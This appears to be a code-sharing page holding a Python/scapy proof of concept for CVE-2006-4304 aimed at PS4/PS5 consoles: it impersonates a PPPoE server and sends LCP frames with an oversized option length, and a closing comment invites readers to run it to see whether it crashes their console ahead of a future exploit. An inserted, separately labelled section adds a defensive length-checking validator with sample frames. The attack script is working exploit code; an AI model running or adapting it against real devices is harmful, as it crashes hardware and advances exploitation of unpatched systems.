Created January 30, 2024 16:02
PoC of CVE-2006-4304 for PS4/PS5
```python
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump

source = b"\xXX\xXX\xXX\xXX\xXX\xXX"       # MAC address of your adapter on PC (replace each XX)
destination = b"\xXX\xXX\xXX\xXX\xXX\xXX"  # MAC address of LAN on your PS4 (replace each XX)
interface = "Realtek PCIe 2.5GbE Family Controller #2"  # get via "ipconfig /all" on Windows, or eth0 or similar on Linux

# wait for the console's PADI and keep the tag it expects echoed back
packet = sniff(iface=interface, filter="pppoed", count=1)
tag_value = packet[PPPoED][0].tag_list[1].tag_value

# PADO (code 0x07) carrying that tag
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)

# wait for the PADR, then answer with PADS (code 0x65) using session id 1
packet = sniff(iface=interface, filter="pppoed", count=1)
payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)

# wait for the first PPPoE session frame, then send an LCP Configure-Request
packet = sniff(iface=interface, filter="pppoes", count=1)
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
packet = srp1(Ether(payload), iface=interface)
hexdump(packet)  # hexdump() prints the reply itself and returns None

payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256  # this number might be different, just a guess
for i in range(20):
    sendp(payload, iface=interface)
```
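The session frames above carry an LCP Configure-Request whose option length byte (0xff) is far larger than the LCP length field (7) and the PPPoE length field (9) that enclose it. The following is an added example, not part of the gist: a pure-stdlib checker of the kind a receiving PPPoE/LCP parser or a passive monitor should apply, which bounds every inner length by the outer one before trusting it. The sample frames are constructed here from the byte layout visible in the PoC, with placeholder MAC addresses, and `pad_to_min_frame` imitates the zero padding an Ethernet NIC adds to short frames.

```python
import struct

ETHERTYPE_PPPOE_SESSION = 0x8864
PPP_PROTO_LCP = 0xC021


def check_pppoe_lcp_frame(frame: bytes):
    """Return (ok, reason). ok is True only if every length field is consistent
    with the bytes actually present: PPPoE length <= carried payload,
    LCP length <= PPPoE payload, and each option length within the LCP body."""
    if len(frame) < 14:
        return False, "truncated Ethernet header"
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETHERTYPE_PPPOE_SESSION:
        return True, "not a PPPoE session frame"
    body = frame[14:]
    if len(body) < 6:
        return False, "truncated PPPoE header"
    ver_type, code, session_id, pppoe_len = struct.unpack("!BBHH", body[:6])
    if ver_type != 0x11 or code != 0x00:
        return False, "unexpected PPPoE version/type/code"
    payload = body[6:]
    if pppoe_len > len(payload):
        return False, f"PPPoE length {pppoe_len} exceeds carried bytes {len(payload)}"
    payload = payload[:pppoe_len]          # ignore any NIC padding beyond the declared length
    if len(payload) < 2:
        return False, "missing PPP protocol field"
    proto = struct.unpack("!H", payload[:2])[0]
    if proto != PPP_PROTO_LCP:
        return True, "not LCP"
    lcp = payload[2:]
    if len(lcp) < 4:
        return False, "truncated LCP header"
    lcp_code, lcp_id, lcp_len = struct.unpack("!BBH", lcp[:4])
    if lcp_len < 4 or lcp_len > len(lcp):
        return False, f"LCP length {lcp_len} inconsistent with {len(lcp)} available bytes"
    options = lcp[4:lcp_len]
    off = 0
    while off < len(options):
        if len(options) - off < 2:
            return False, "option header runs past LCP length"
        opt_type, opt_len = options[off], options[off + 1]
        if opt_len < 2:
            return False, f"option {opt_type:#x} has invalid length {opt_len}"
        if off + opt_len > len(options):
            # the defect class the PoC probes: an option length that is trusted
            # without being bounded by the enclosing LCP length
            return False, f"option {opt_type:#x} length {opt_len} exceeds LCP length"
        off += opt_len
    return True, "consistent"


# --- constructed sample frames (placeholder MACs, not from the gist) ---
DST = b"\x00\x00\x00\x00\x00\x01"
SRC = b"\x00\x00\x00\x00\x00\x02"


def build_session_frame(session_id: int, pppoe_len: int, lcp_body: bytes) -> bytes:
    """Ethernet + PPPoE session header + PPP protocol 0xc021 + raw LCP body."""
    hdr = struct.pack("!HBBHH", ETHERTYPE_PPPOE_SESSION, 0x11, 0x00, session_id, pppoe_len)
    return DST + SRC + hdr + b"\xc0\x21" + lcp_body


def pad_to_min_frame(frame: bytes, min_len: int = 60) -> bytes:
    """Imitate the zero padding a NIC adds to short Ethernet frames."""
    return frame + b"\x00" * max(0, min_len - len(frame))


# Well-formed Configure-Request with one MRU option (type 1, length 4, value 1500).
GOOD = pad_to_min_frame(build_session_frame(1, 10, b"\x01\x01\x00\x08\x01\x04\x05\xdc"))

# Layout of the PoC's session frame: LCP length 7 but option length byte 0xff.
BAD_OPTION = pad_to_min_frame(build_session_frame(1, 9, b"\x01\x01\x00\x07\xab\xff"))

# PPPoE length field larger than the bytes the frame actually carries.
BAD_PPPOE_LEN = build_session_frame(1, 0x0200, b"\x01\x01\x00\x08\x01\x04\x05\xdc")


if __name__ == "__main__":
    for name, frame in (("GOOD", GOOD), ("BAD_OPTION", BAD_OPTION), ("BAD_PPPOE_LEN", BAD_PPPOE_LEN)):
        print(name, check_pppoe_lcp_frame(frame))
```

The order of the checks matters: the PPPoE length is validated against the frame before the LCP length is read, and the LCP length before any option is walked, so a later field can never be used to index past the bytes an earlier field has already bounded.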
I actually don't know, but if it is .02 it's a small change, so I don't think it is the error patch. I'm not truly sure, though, so the best thing you guys can do is test this script: if it crashes your console, the future exploit should work too.